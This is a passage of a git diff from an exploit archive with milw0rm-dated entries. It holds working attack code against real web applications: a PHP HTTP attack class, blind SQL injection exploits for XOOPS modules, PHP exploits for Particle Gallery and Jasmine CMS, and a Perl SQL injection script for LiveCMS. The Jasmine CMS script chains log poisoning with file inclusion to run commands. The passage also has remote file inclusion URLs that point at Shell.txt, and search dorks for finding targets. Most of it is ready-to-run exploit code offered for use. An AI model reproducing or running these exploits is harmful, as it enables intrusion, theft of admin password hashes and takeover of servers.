Several + * methods are supported: + * + * $this->proxyauth("darkfig","dapasswd"); + * or + * $this->proxyauth("darkfig:dapasswd"); + * + * @param string $proxyuser + * @param string $proxypass + */ + public function proxyauth($proxyauth,$proxypasse='') + { + // $this->proxyauth("darkfig:password"); + if(empty($proxypasse)) + { + preg_match("/^(.*):(.*)$/",$proxyauth,$proxautharr); + $proxu = $proxautharr[1]; + $proxp = $proxautharr[2]; + $this->proxyuser=$proxu; + $this->proxypass=$proxp; + } + // $this->proxyauth("darkfig","password"); + else + { + $this->proxyuser=$proxyauth; + $this->proxypass=$proxypasse; + } + } + + + /** + * This function allows you to set the "User-Agent" header. + * Several methods are possible to do that: + * + * $this->agent("Mozilla Firefox"); + * or + * $this->addheader("User-Agent: Mozilla Firefox"); + * or + * $this->addheader("User-Agent","Mozilla Firefox"); + * + * @param string $useragent + */ + public function agent($useragent) + { + $this->agent=$useragent; + } + + + /** + * This function returns the header which will be + * in the next request. + * + * $this->showheader(); + * + * @return $header + */ + public function showheader() + { + return $this->header; + } + + + /** + * This function returns the cookie which will be + * in the next request. + * + * $this->showcookie(); + * + * @return $storedcookies + */ + public function showcookie() + { + return $this->cookie; + } + + + /** + * This function returns the last formed + * http request (the http packet). + * + * $this->showlastrequest(); + * + * @return $last_http_request + */ + public function showlastrequest() + { + return $this->packet; + } + + + /** + * This function sends the formed http packet with the + * GET method. You can precise the port of the host. 
+ * + * $this->get("http://localhost"); + * $this->get("http://localhost:888/xd/tst.php"); + * + * @param string $urlwithpath + * @return $server_response + */ + public function get($url) + { + $this->target($url); + $this->method="get"; + return $this->sock(); + } + + + /** + * This function sends the formed http packet with the + * POST method. You can precise the port of the host. + * + * $this->post("http://localhost/index.php","admin=1&user=dark"); + * + * @param string $urlwithpath + * @param string $postdata + * @return $server_response + */ + public function post($url,$data) + { + $this->target($url); + $this->method="post"; + $this->data=$data; + return $this->sock(); + } + + + /** + * This function sends the formed http packet with the + * POST method using the multipart/form-data enctype. + * + * $array = array( + * frmdt_url => "http://localhost/upload.php", + * frmdt_boundary => "123456", # Optional + * "email" => "me@u.com", + * "varname" => array( + * frmdt_type => "image/gif", # Optional + * frmdt_transfert => "binary", # Optional + * frmdt_filename => "hello.php", + * frmdt_content => "")); + * $this->formdata($array); + * + * @param array $array + * @return $server_response + */ + public function formdata($array) + { + $this->target($array[frmdt_url]); + $this->method="formdata"; + $this->data=''; + if(!isset($array[frmdt_boundary])) $this->boundary="phpsploit"; + else $this->boundary=$array[frmdt_boundary]; + foreach($array as $key => $value) + { + if(!preg_match("#^frmdt_(boundary|url)#",$key)) + { + $this->data .= "-----------------------------".$this->boundary."\r\n"; + $this->data .= "Content-Disposition: form-data; name=\"".$key."\";"; + if(!is_array($value)) + { + $this->data .= "\r\n\r\n".$value."\r\n"; + } + else + { + $this->data .= " filename=\"".$array[$key][frmdt_filename]."\";\r\n"; + if(isset($array[$key][frmdt_type])) $this->data .= "Content-Type: ".$array[$key][frmdt_type]."\r\n"; + if(isset($array[$key][frmdt_transfert])) 
$this->data .= "Content-Transfer-Encoding: ".$array[$key][frmdt_transfert]."\r\n"; + $this->data .= "\r\n".$array[$key][frmdt_content]."\r\n"; + } + } + } + $this->data .= "-----------------------------".$this->boundary."--\r\n"; + return $this->sock(); + } + + + /** + * This function returns the content of the server response + * without the headers. + * + * $this->getcontent($this->get("http://localhost/")); + * or + * $this->getcontent(); + * + * @param string $server_response + * @return $onlythecontent + */ + public function getcontent($code='') + { + if(empty($code)) $code = $this->recv; + $content = explode("\n",$code); + $onlycode = ''; + for($i=1;$igetheader($this->post("http://localhost/x.php","x=1&z=2")); + * or + * $this->getheader(); + * + * @param string $server_response + * @return $onlytheheaders + */ + public function getheader($code='') + { + if(empty($code)) $code = $this->recv; + $header = explode("\n",$code); + $onlyheader = $header[0]."\n"; + for($i=1;$iaddcookie($cookn,$cookv); + } + } + + + /** + * This function is called by the get()/post() functions. + * You don't have to call it. + * + * @param string $urltarg + */ + private function target($urltarg) + { + if(!preg_match("/^http:\/\/(.*)\//",$urltarg)) $urltarg .= "/"; + $this->url=$urltarg; + + $array = explode("/",str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg))); + $this->host=$array[0]; + + preg_match("/:(\d+)\//",$urltarg,$matches); + $this->port=empty($matches[1]) ? 80 : $matches[1]; + + $temp = str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg)); + preg_match("/\/(.*)\//",$temp,$matches); + $this->path=str_replace("//","/","/".$matches[1]."/"); + + if($this->port > 65535) die("Error: Invalid port number"); + } + + + /** + * If you call this function, the script will + * extract all "Set-Cookie" headers values + * and it will automatically add them into the "Cookie" header + * for all next requests. 
+ * + * $this->cookiejar(1); // enabled + * $this->cookiejar(0); // disabled + * + */ + public function cookiejar($code) + { + if($code===0) $this->cookiejar=''; + if($code===1) $this->cookiejar=1; + else + { + $this->getcookie($code); + } + } + + + /** + * If you call this function, the script will + * follow all redirections sent by the server. + * + * $this->allowredirection(1); // enabled + * $this->allowredirection(0); // disabled + * + * @return $this->get($locationresponse) + */ + public function allowredirection($code) + { + if($code===0) $this->allowredirection=''; + if($code===1) $this->allowredirection=1; + else + { + if(preg_match("/(location|content-location|uri): (.*)/i",$code,$codearr)) + { + $location = str_replace(chr(13),'',$codearr[2]); + if(!eregi("://",$location)) + { + return $this->get("http://".$this->host.$this->path.$location); + } + else + { + return $this->get($location); + } + } + else + { + return $code; + } + } + } + + + /** + * This function allows you to reset some parameters: + * + * $this->reset(header); // headers cleaned + * $this->reset(cookie); // cookies cleaned + * $this->reset(); // clean all parameters + * + * @param string $func + */ + public function reset($func='') + { + switch($func) + { + case "header": + $this->header=''; + break; + + case "cookie": + $this->cookie=''; + break; + + default: + $this->cookiejar=''; + $this->header=''; + $this->cookie=''; + $this->allowredirection=''; + $this->agent=''; + break; + } + } +} +?> + +# milw0rm.com [2007-04-03] diff --git a/platforms/php/webapps/3655.htm b/platforms/php/webapps/3655.htm index 1e86d6bac..731b99517 100755 --- a/platforms/php/webapps/3655.htm +++ b/platforms/php/webapps/3655.htm @@ -1,290 +1,290 @@ - - -XOOPS Module PopnupBlog <= 2.52 (postid) BLIND SQL Injection Exploit - - - - - - - -
    - -

    XOOPS Module PopnupBlog <= 2.52 (postid) BLIND SQL Injection Exploit

    - -

    - Target:[http://[target]/ -               -

    -
    -  Path:[http://[target]/[scriptpath]    - -

    -  Character:[Md5 - Character 1-32]   - -

    -

    - Article Id:[print.php?articleid=]   - -

    -

    -
    -
    -

    - -ajann

    -

    -
    - - - - - -# milw0rm.com [2007-04-03] + + +XOOPS Module PopnupBlog <= 2.52 (postid) BLIND SQL Injection Exploit + + + + + + + +
    + +

    XOOPS Module PopnupBlog <= 2.52 (postid) BLIND SQL Injection Exploit

    + +

    + Target:[http://[target]/ +               +

    +
    +  Path:[http://[target]/[scriptpath]    + +

    +  Character:[Md5 + Character 1-32]   + +

    +

    + Article Id:[print.php?articleid=]   + +

    +

    +
    +
    -

    - -ajann

    -

    -
    - - - - - -# milw0rm.com [2007-04-04] + + +XOOPS Module WF-Snippets <= 1.02 (c) BLIND SQL Injection Exploit + + + + + + + +
    + +

    XOOPS Module WF-Snippets <= 1.02 (c) BLIND SQL Injection Exploit

    + +

    + Target:[http://[target]/ +               +

    +
    +  Path:[http://[target]/[scriptpath]    + +

    +  Character:[Md5 + Character 1-32]   + +

    +

    + Article Id:[print.php?articleid=]   + +

    +

    +
    +",$temp3[1]); - $ret_hash=$temp4[0]; - - echo "\r\n[+] Admin User: " . $ret_hash . "\n";} - else{} -} - -footer(); - -?> - -# milw0rm.com [2007-06-01] +#!/usr/bin/php -q -d short_open_tag=on +set_var("COMMENT_ID", ""); +if ($_GET["editcomment"] <> ""){ + $sql = "SELECT * FROM " . $dbprefix . "comments WHERE commentid = " . dbSecure($_GET["editcomment"]); + $cme = $db->execute($sql); + if ($usr->Access > 1 || ($_SESSION["userid"] == $cme->fields["userid"])){ + // allow user to edit the comment + $t->set_var("COMMENTS_TYPE", "Edit"); + $t->set_var("COMMENT_ID", $cme->fields["commentid"]); + $t->set_var("COMMENTS_FORM", $core . "&commentspage=" . $page); + if ($_POST["comments"] <> ""){ + $t->set_var("COMMENTS_TEXT", un($_POST["comments"])); + } else { + $t->set_var("COMMENTS_TEXT", $cme->fields["comments"]); + } + } + + +...classic! + +*/ + +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +if ($argc<3) { +print "-------------------------------------------------------------------------\r\n"; +print " Particle Gallery <= 1.0.1 SQL Injection Exploit\r\n"; +print "-------------------------------------------------------------------------\r\n"; +print "Usage: w4ck1ng_pg.php [HOST] [PATH]\r\n\r\n"; +print "[HOST] = Target server's hostname or ip address\r\n"; +print "[PATH] = Path where Particle Gallery is located\r\n"; +print "e.g. 
w4ck1ng_pg.php 0 victim.com /pg/\r\n"; +print "-------------------------------------------------------------------------\r\n"; +print " http://www.w4ck1ng.com\r\n"; +print " ...Silentz\r\n"; +print "-------------------------------------------------------------------------\r\n"; +die; +} + +function footer(){ + +print "-------------------------------------------------------------------------\r\n"; +print " http://www.w4ck1ng.com\r\n"; +print " ...Silentz\r\n"; +print "-------------------------------------------------------------------------\r\n"; + +} + +//Props to rgod for the following functions + +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); +} + +function make_seed() +{ + list($usec, $sec) = explode(' ', microtime()); + return (float) $sec + ((float) $usec * 100000); +} + +$host = $argv[1]; +$path = $argv[2]; +$port=80; +$proxy=""; + +for ($i=4; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{ +$cmd.=" ".$argv[$i]; +} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} + +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + + +print "-------------------------------------------------------------------------\r\n"; +print " Particle Gallery <= 1.0.1 SQL Injection Exploit\r\n"; +print "-------------------------------------------------------------------------\r\n"; + + echo "\r\n[+] Checking if user exists..."; + + $data="username=w4ck1ng"; + $data.="&password=w4ck1ng"; + $data.="&from="; + $packet ="POST " . $p . "auth.php?do=signin HTTP/1.1\r\n"; + $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Content-Length: ".strlen($data)."\r\n"; + $packet.="Connection: Close\r\n\r\n"; + $packet.=$data; + + sendpacketii($packet); + + if (strstr($html,"User Control Panel")){echo "...Yep!\r\n";} + else{echo "...Nope!"; + + echo "\r\n[+] Registering..."; + + $data="rusername=w4ck1ng"; + $data.="&password=w4ck1ng"; + $data.="&password2=w4ck1ng"; + $data.="&email=w4ck1ng%40www.com"; + $data.="&do=register"; + $packet ="POST " . $p . "auth.php?page=register HTTP/1.1\r\n"; + $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Content-Length: ".strlen($data)."\r\n"; + $packet.="Connection: Close\r\n\r\n"; + $packet.=$data; + + sendpacketii($packet); + + $temp=explode("Set-Cookie: ",$html); + $temp2=explode(" ",$temp[1]); + $cookie=$temp2[0]; + + if (strstr($html,"Location: index.php?act=newbie")){echo "...Successful!\r\n";} + if (strstr($html,"Registrations are not currently being accepted.")){echo "...Registration Disabled!\r\n"; footer(); exit;} + else{} } + + echo "[+] Signing In..."; + + $data="username=w4ck1ng"; + $data.="&password=w4ck1ng"; + $data.="&from="; + $packet ="POST " . $p . 
"auth.php?do=signin HTTP/1.1\r\n"; + $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Content-Length: ".strlen($data)."\r\n"; + $packet.="Connection: Close\r\n\r\n"; + $packet.=$data; + + sendpacketii($packet); + + $temp=explode("Set-Cookie: ",$html); + $temp2=explode(" ",$temp[1]); + $cookie=$temp2[0]; + + if (strstr($html,"Welcome to your account control panel")){echo "...Successful!";} + else{die("...Failed!\r\n"); footer(); exit;} + + $packet ="GET " . $p . " HTTP/1.1\r\n"; + $packet.="Host: " . $host . "\r\n"; + $packet.="Cookie: " . $cookie . "\r\n"; + $packet.="Connection: Close\r\n\r\n"; + sendpacketii($packet); + + if (strstr($html,"
    ",$temp[1]); - $password = $temp2[0]; - - if($username && $password){ - - head(); - print "[+] Admin User: " . $username . "\r\n"; - print "[+] Admin Hash: " . $password . "\r\n"; - footer(); - - } - - else{head(); print "[-] Exploit Failed...\r\n"; footer();} -} -?> - -# milw0rm.com [2007-06-19] +#!/usr/bin/php -q -d short_open_tag=on +'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +function head(){ + + print "-------------------------------------------------------------------------\r\n"; + print " Jasmine CMS 1.0 SQL Injection/Remote Code Execution Exploit\r\n"; + print "-------------------------------------------------------------------------\r\n"; +} + +function footer(){ + + print "-------------------------------------------------------------------------\r\n"; + print " http://www.w4ck1ng.com\r\n"; + print " ...Silentz\r\n"; + print "-------------------------------------------------------------------------\r\n"; +} + + +if ($exploit==0){ + +head(); + +$code=""; +$packet="GET " . $p . $code . " HTTP/1.0\r\n"; +$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; +$packet.="Host: " . $host . "\r\n"; +$packet.="Connection: close\r\n\r\n"; +sendpacketii($packet); + +$sql = "' UNION SELECT id,username,email,signature,avatar_path,joined,total_visits,status FROM user WHERE id = '1'/*"; + +$data="login_username=" . $sql; +$data.="&login_password="; +$data.="login=Login"; +$packet ="POST " . $path . 
"login.php HTTP/1.1\r\n"; +$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +$packet.=$data; +sendpacketii($packet); + +if (strstr($html,"302 Found")){} +else{print "[-] Exploit Failed...\r\n"; footer(); exit();} +$temp=explode("Set-Cookie: ",$html); +$temp2=explode(" ",$temp[1]); +$cookie=$temp2[0]; + +$paths= array ( +"../../../../../var/log/httpd/access_log", +"../../../../../var/log/httpd/error_log", +"../apache/logs/error.log", +"../apache/logs/access.log", +"../../apache/logs/error.log", +"../../apache/logs/access.log", +"../../../apache/logs/error.log", +"../../../apache/logs/access.log", +"../../../../apache/logs/error.log", +"../../../../apache/logs/access.log", +"../../../../../apache/logs/error.log", +"../../../../../apache/logs/access.log", +"../logs/error.log", +"../logs/access.log", +"../../logs/error.log", +"../../logs/access.log", +"../../../logs/error.log", +"../../../logs/access.log", +"../../../../logs/error.log", +"../../../../logs/access.log", +"../../../../../logs/error.log", +"../../../../../logs/access.log", +"../../../../../etc/httpd/logs/access_log", +"../../../../../etc/httpd/logs/access.log", +"../../../../../etc/httpd/logs/error_log", +"../../../../../etc/httpd/logs/error.log", +"../../../../../var/www/logs/access_log", +"../../../../../var/www/logs/access.log", +"../../../../../usr/local/apache/logs/access_log", +"../../../../../usr/local/apache/logs/access.log", +"../../../../../var/log/apache/access_log", +"../../../../../var/log/apache/access.log", +"../../../../../var/log/access_log", +"../../../../../var/www/logs/error_log", +"../../../../../var/www/logs/error.log", +"../../../../../usr/local/apache/logs/error_log", +"../../../../../usr/local/apache/logs/error.log", 
+"../../../../../var/log/apache/error_log", +"../../../../../var/log/apache/error.log", +"../../../../../var/log/access_log", +"../../../../../var/log/error_log" +); + +for ($i=0; $i<=count($paths)-1; $i++) +{ +$a=$i+2; + +$packet ="GET " . $path . "admin/plugin_manager.php?u=" . $paths[$i] . "%00&cmd=" . $cmd . " HTTP/1.1\r\n"; +$packet.="Host: " . $host . "\r\n"; +$packet.="Cookie: " . $cookie . "\r\n"; +$packet.="Connection: Close\r\n\r\n"; + +sendpacketii($packet); + +if (strstr($html,"w4ckw4ck")) + { + $temp=explode("w4ckw4ck",$html); + print $temp[1]; + footer(); exit; + } + } +} + +if($exploit==1){ + + $sql = "news.php?item=-999/**/UNION/**/SELECT/**/0,password,0,0,0,0,username/**/FROM/**/user/**/WHERE/**/id=1/*"; + $packet ="GET " . $path . $sql . " HTTP/1.1\r\n"; + $packet.="Host: " . $host . "\r\n"; + $packet.="User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n"; + $packet.="Connection: Close\r\n\r\n"; + sendpacketii($packet); + + $temp = explode("Posted by ",$html); + $temp2 = explode("at ",$temp[1]); + $username = $temp2[0]; + + $temp = explode("",$temp[1]); + $password = $temp2[0]; + + if($username && $password){ + + head(); + print "[+] Admin User: " . $username . "\r\n"; + print "[+] Admin Hash: " . $password . "\r\n"; + footer(); + + } + + else{head(); print "[-] Exploit Failed...\r\n"; footer();} +} +?> + +# milw0rm.com [2007-06-19] diff --git a/platforms/php/webapps/4082.pl b/platforms/php/webapps/4082.pl index 58970088f..4f6b88468 100755 --- a/platforms/php/webapps/4082.pl +++ b/platforms/php/webapps/4082.pl 
@@ -1,145 +1,145 @@ -#!/usr/bin/perl -############################################################################################## -# ___ ___ _ -# / _ \ / _ \ | | -# __ _| | | | | | |_ __ ___ _ __ ___| |_ -# / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __| -# | (_| | |_| | |_| | | | \__ \_| | | | __/ |_ -# \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__| -# __/ | -# |___/ -############################################################################################### -#INFO: -#Program Title ################################################################################ -#LiveCMS <= 3.4 SQL Injection, Absolute Path Disclosure, XSS Injection, Arbitrary File Upload -# -#Description ################################################################################## -#This is a free CMS system. -# -#Script Download ############################################################################## -#http://sourceforge.net/project/downloading.php?group_id=78735&use_mirror=ufpr&filename=livecms-3.4.tar.gz&12060460 -#http://livecms.com -# -#Original Advisory ############################################################################# -#http://www.g00ns-forum.net/showthread.php?t=9350 -# -#Exploit ####################################################################################### -#credz to Vipsta and Clorox for vulnerability -#[c]ode by TrinTiTTY (2007) www.g00ns.net -#shoutz: z3r0, milf, blackhill, godxcel, murderskillz, katalyst, SyNiCaL, OD, pr0be, rezen, str0ke, -#fish, rey, canuck, c0ma, sick, trin, a59, seven, fury, , Bernard, and everyone else at g00ns.net -# -#Details ####################################################################################### -#APD: The absolute path is disclosed in a mysql error when categoria.php's paramater cid is queried with a non-defined -#variable. 
example: categoria.php?cid=' -#XSS: Article names are not properly santised, a user could insert malicious javascript -#AFU: Articles can have a small image that is uploaded with them, however LiveCMS fails to restrict what file types -#can be uploaded. A user could upload a malicious script with this method and compromise the server. -#GoogleDork: "powered by livecms" -# -################################################################################################ -#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++# -# LiveCMS <= 3.3 [ categoria.php ] # -# ] Remote SQL Injection [ # -# # -# [c]ode by TrinTiTTY [at] g00ns.net # -# Vulnerability by Vipsta and Clorox # -# # -# # -# [irc.g00ns.net] [www.g00ns.net] [ts.g00ns.net] # -#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++# - -use LWP; - -$host = @ARGV[0]; -$ua = LWP::UserAgent->new; - -my $uject ='categoria.php?cid=1%20UNION%20ALL%20SELECT%201,2,user,4,5,6%20FROM%20live_admin%20WHERE%20userid=1/*'; -my $pject ='categoria.php?cid=1%20UNION%20ALL%20SELECT%201,2,pass,4,5,6%20FROM%20live_admin%20WHERE%20userid=1/*'; - -if (@ARGV < 1){&top( );&usage( )} -elsif ($host =~ /http:\/\//){print"\n\n [-] Don't use http:// in host\n";exit( 0 );} -else { &getUser( ) } - - - -sub getUser( ) { - system("color 4"); - &top( ); - print "\n [~] Retrieving admin username\n"; - $nameres = $ua->get("http://$host/$uject"); - - $namecon = $nameres->content; - - if ($namecon =~ /\){ - $crack = $1; - print "\n [+] Password hash resolved: $crack\n"; - system("color 7"); - exit(0); - } - else { - print "\n [-] Couldn't resolve hash\n"; - system("color 7"); - exit(0); - } -} -sub top( ) -{ - print q { - ################################################################## - # LiveCMS <= 3.3 [ categoria.php ] # - # ] Remote SQL Injection [ # - # # - # [c]ode by TrinTiTTY [at] g00ns.net # - # Vulnerability by Vipsta and Clorox # - ################################################################## - } -} -sub 
usage( ) -{ - print "\n Usage: perl livecms33.pl \n"; - print "\n Example: perl livecms33.pl www.example.com/path\n\n"; - exit(0); -} - -# milw0rm.com [2007-06-20] +#!/usr/bin/perl +############################################################################################## +# ___ ___ _ +# / _ \ / _ \ | | +# __ _| | | | | | |_ __ ___ _ __ ___| |_ +# / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __| +# | (_| | |_| | |_| | | | \__ \_| | | | __/ |_ +# \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__| +# __/ | +# |___/ +############################################################################################### +#INFO: +#Program Title ################################################################################ +#LiveCMS <= 3.4 SQL Injection, Absolute Path Disclosure, XSS Injection, Arbitrary File Upload +# +#Description ################################################################################## +#This is a free CMS system. +# +#Script Download ############################################################################## +#http://sourceforge.net/project/downloading.php?group_id=78735&use_mirror=ufpr&filename=livecms-3.4.tar.gz&12060460 +#http://livecms.com +# +#Original Advisory ############################################################################# +#http://www.g00ns-forum.net/showthread.php?t=9350 +# +#Exploit ####################################################################################### +#credz to Vipsta and Clorox for vulnerability +#[c]ode by TrinTiTTY (2007) www.g00ns.net +#shoutz: z3r0, milf, blackhill, godxcel, murderskillz, katalyst, SyNiCaL, OD, pr0be, rezen, str0ke, +#fish, rey, canuck, c0ma, sick, trin, a59, seven, fury, , Bernard, and everyone else at g00ns.net +# +#Details ####################################################################################### +#APD: The absolute path is disclosed in a mysql error when categoria.php's paramater cid is queried with a non-defined +#variable. 
example: categoria.php?cid=' +#XSS: Article names are not properly santised, a user could insert malicious javascript +#AFU: Articles can have a small image that is uploaded with them, however LiveCMS fails to restrict what file types +#can be uploaded. A user could upload a malicious script with this method and compromise the server. +#GoogleDork: "powered by livecms" +# +################################################################################################ +#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++# +# LiveCMS <= 3.3 [ categoria.php ] # +# ] Remote SQL Injection [ # +# # +# [c]ode by TrinTiTTY [at] g00ns.net # +# Vulnerability by Vipsta and Clorox # +# # +# # +# [irc.g00ns.net] [www.g00ns.net] [ts.g00ns.net] # +#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++# + +use LWP; + +$host = @ARGV[0]; +$ua = LWP::UserAgent->new; + +my $uject ='categoria.php?cid=1%20UNION%20ALL%20SELECT%201,2,user,4,5,6%20FROM%20live_admin%20WHERE%20userid=1/*'; +my $pject ='categoria.php?cid=1%20UNION%20ALL%20SELECT%201,2,pass,4,5,6%20FROM%20live_admin%20WHERE%20userid=1/*'; + +if (@ARGV < 1){&top( );&usage( )} +elsif ($host =~ /http:\/\//){print"\n\n [-] Don't use http:// in host\n";exit( 0 );} +else { &getUser( ) } + + + +sub getUser( ) { + system("color 4"); + &top( ); + print "\n [~] Retrieving admin username\n"; + $nameres = $ua->get("http://$host/$uject"); + + $namecon = $nameres->content; + + if ($namecon =~ /\){ + $crack = $1; + print "\n [+] Password hash resolved: $crack\n"; + system("color 7"); + exit(0); + } + else { + print "\n [-] Couldn't resolve hash\n"; + system("color 7"); + exit(0); + } +} +sub top( ) +{ + print q { + ################################################################## + # LiveCMS <= 3.3 [ categoria.php ] # + # ] Remote SQL Injection [ # + # # + # [c]ode by TrinTiTTY [at] g00ns.net # + # Vulnerability by Vipsta and Clorox # + ################################################################## + } +} +sub 
usage( )
+{
+ print "\n Usage: perl livecms33.pl \n";
+ print "\n Example: perl livecms33.pl www.example.com/path\n\n";
+ exit(0);
+}
+
+# milw0rm.com [2007-06-20]
diff --git a/platforms/php/webapps/4084.txt b/platforms/php/webapps/4084.txt
index 638d05877..79fb95415 100755
--- a/platforms/php/webapps/4084.txt
+++ b/platforms/php/webapps/4084.txt
@@ -1,31 +1,31 @@
-# XOOPS Module WiwiMod v0.4 (spaw_root) RFI Vulnerability
-
-# D.Script:
-
-http://codigolivre.org.br/frs/download.php/1745/xoops2-mod_wiwimod_0.4_xavier_jimenez.zip
-
-# V.Code :
- include $spaw_root.'config/spaw_control.config.php';
- include $spaw_root.'class/toolbars.class.php';
- include $spaw_root.'class/lang.class.php';
-
-# In :
- /spaw/spaw_control.class.php
-
-# Exploits:
- /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=Shell.txt?
-
-#D0Rk:
- allinurl:/modules/wiwimod/
-
-
-# Discovered by:
- GoLd_M = [Mahmood_ali]
-
-# Homepage:
- http://www.Tryag.Com/cc
-
-# Sp.Thanx To :
- Tryag-Team & Asb-May's Team
-
-# milw0rm.com [2007-06-20]
+# XOOPS Module WiwiMod v0.4 (spaw_root) RFI Vulnerability
+
+# D.Script:
+
+http://codigolivre.org.br/frs/download.php/1745/xoops2-mod_wiwimod_0.4_xavier_jimenez.zip
+
+# V.Code :
+ include $spaw_root.'config/spaw_control.config.php';
+ include $spaw_root.'class/toolbars.class.php';
+ include $spaw_root.'class/lang.class.php';
+
+# In :
+ /spaw/spaw_control.class.php
+
+# Exploits:
+ /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=Shell.txt?
+
+#D0Rk:
+ allinurl:/modules/wiwimod/
+
+
+# Discovered by:
+ GoLd_M = [Mahmood_ali]
+
+# Homepage:
+ http://www.Tryag.Com/cc
+
+# Sp.Thanx To :
+ Tryag-Team & Asb-May's Team
+
+# milw0rm.com [2007-06-20]
diff --git a/platforms/php/webapps/4085.txt b/platforms/php/webapps/4085.txt
index b4fc83b98..4c1fd19ca 100755
--- a/platforms/php/webapps/4085.txt
+++ b/platforms/php/webapps/4085.txt
@@ -1,31 +1,31 @@
-# Musoo 0.21(GLOBALS[ini_array][EXTLIB_PATH])Remote File Include
-
-# D.Script:
- http://osx.freshmeat.net/redir/musoo/65735/url_tgz/musoo-0.21.tar.gz
-
-# V.Code :
- require_once( $GLOBALS["ini_array"]["EXTLIB_PATH"].'/
-
-# In :
- /msDb.php
- /modules/MusooTemplateLite.php
- /modules/SoundImporter.php
-
-# Exploits:
- 1:/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?
- 2:/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?
- 3:/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?
-
-# Video
- http://norcalvex.org/v1d30/Musoo/Musoo-Video.rar
-
-# Discovered by:
- GoLd_M = [Mahmood_ali]
-
-# Homepage:
- http://www.Tryag.Com/cc
-
-# Sp.Thanx To :
- Tryag-Team & Asb-May's Team
-
-# milw0rm.com [2007-06-20]
+# Musoo 0.21(GLOBALS[ini_array][EXTLIB_PATH])Remote File Include
+
+# D.Script:
+ http://osx.freshmeat.net/redir/musoo/65735/url_tgz/musoo-0.21.tar.gz
+
+# V.Code :
+ require_once( $GLOBALS["ini_array"]["EXTLIB_PATH"].'/
+
+# In :
+ /msDb.php
+ /modules/MusooTemplateLite.php
+ /modules/SoundImporter.php
+
+# Exploits:
+ 1:/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?
+ 2:/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?
+ 3:/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?
+
+# Video
+ http://norcalvex.org/v1d30/Musoo/Musoo-Video.rar
+
+# Discovered by:
+ GoLd_M = [Mahmood_ali]
+
+# Homepage:
+ http://www.Tryag.Com/cc
+
+# Sp.Thanx To :
+ Tryag-Team & Asb-May's Team
+
+# milw0rm.com [2007-06-20]
diff --git a/platforms/php/webapps/4086.pl b/platforms/php/webapps/4086.pl
index 6712d8990..f12ca0e91 100755
--- a/platforms/php/webapps/4086.pl
+++ b/platforms/php/webapps/4086.pl
@@ -1,65 +1,64 @@
-
-#!/usr/bin/perl
-#
-# LMS - LAN Management System 1.9.6 - RFI
-#
-# Risk : High (Remote Code Execution)
-#
-# Url: http://www.lms.org.pl/download/1.9/lms-1.9.6.tar.gz
-#
-# Exploit:
-# http://site.com/[path]/lib/language.php?_LIB_DIR=[Evil_Script]
-#
-# (c)oded and f0und3d by Kw3[R]Ln
-#
-# Romanian Security Team .: hTTp://RSTZONE.NET :.
-#
-#
-# greetz to all RST [rstzone.net] MEMBERZ, Nemessis, Slick, str0ke, SpiridusuCaddy, zbeng, ENCODED, # Death, Ciupercutza [LUV TEAM] and all i forgot !
-#
-# Fuckz: GM [h4cky0u] -[bigest nub]
-
-use LWP::Simple;
-
